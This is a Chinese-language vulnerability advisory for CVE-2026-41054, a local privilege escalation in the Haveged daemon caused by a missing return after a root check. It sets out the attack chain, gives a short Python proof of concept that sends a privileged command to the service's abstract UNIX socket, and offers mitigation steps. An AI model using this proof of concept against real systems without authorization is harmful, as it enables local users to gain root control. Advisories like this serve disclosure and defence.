CVE-2026-41054 CVSS 7.8 高危

CVE-2026-41054 Haveged权限提升漏洞

披露日期: 2026-05-20

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-41054

漏洞类型

权限提升

CVSS评分

7.8 高危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Haveged

漏洞概述

CVE-2026-41054是Haveged随机数生成器软件中的一个安全漏洞。该漏洞源于`socket_handler`函数在处理抽象UNIX socket连接时的逻辑缺陷。尽管代码检测到非root用户并准备拒绝连接，但未能终止执行流程，导致本地低权限用户可绕过安全检查，执行特权命令，进而提升系统权限。

技术细节

该漏洞的核心在于Haveged服务端对抽象UNIX socket (`\0/sys/entropy/haveged`) 的访问控制逻辑存在严重缺陷。在`src/havegecmd.c`文件的`socket_handler`函数中，程序通过`SO_PEERCRED`获取客户端UID并判断其是否为root。当检测到非root用户时，代码虽然设置了`ASCII_NAK`（拒绝确认）标志，但开发人员遗漏了关键的`return`语句或异常处理流程。这导致程序在准备拒绝响应的同时，继续向下执行`switch`语句解析并处理用户发送的控制指令。因此，任何本地低权限攻击者均可通过连接该socket并发送特权命令（如`MAGIC_CHROOT`），使服务端以root身份执行操作，从而成功实现本地权限提升。

攻击链分析

STEP 1

侦察

攻击者确认目标系统上运行着Haveged服务，且监听在抽象UNIX socket (\0/sys/entropy/haveged) 上。

STEP 2

访问

攻击者获取目标系统的本地低权限用户访问权限。

STEP 3

利用

攻击者编写脚本连接到Haveged的socket接口，并发送特权命令（如MAGIC_CHROOT）。

STEP 4

绕过

由于`socket_handler`在检测到非root用户后未停止执行，命令被传递给switch语句处理。

STEP 5

提权

Haveged服务以root权限执行了攻击者的命令，导致攻击者获得系统的高权限控制。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import socket
import sys

# PoC for CVE-2026-41054: Haveged Privilege Escalation
# This script demonstrates how a low-privileged user can connect to the
# abstract Unix socket and potentially execute privileged commands.

SOCKET_PATH = "\0/sys/entropy/haveged"

def exploit():
    try:
        # Create a Unix domain socket
        sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
        
        # Connect to the abstract socket used by haveged
        print(f"[*] Connecting to {SOCKET_PATH}...")
        sock.connect(SOCKET_PATH)
        print("[+] Connected successfully.")

        # The vulnerability allows non-root users to send commands.
        # 'MAGIC_CHROOT' is mentioned in the description as a privileged command.
        # Sending a dummy command to trigger the switch statement without root check.
        payload = b"MAGIC_CHROOT" 
        
        print(f"[*] Sending payload: {payload.decode()}")
        sock.sendall(payload)

        # Attempt to receive response
        response = sock.recv(1024)
        print(f"[+] Received response: {response.decode(errors='ignore')}")

    except Exception as e:
        print(f"[-] An error occurred: {e}")
    finally:
        sock.close()

if __name__ == "__main__":
    exploit()

影响范围

Haveged (修复前版本)

防御指南

临时缓解措施

如果无法立即升级，建议暂时停止Haveged服务，直到补丁应用完毕，或者修改源代码在检测到非root用户时添加return语句以阻断执行。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表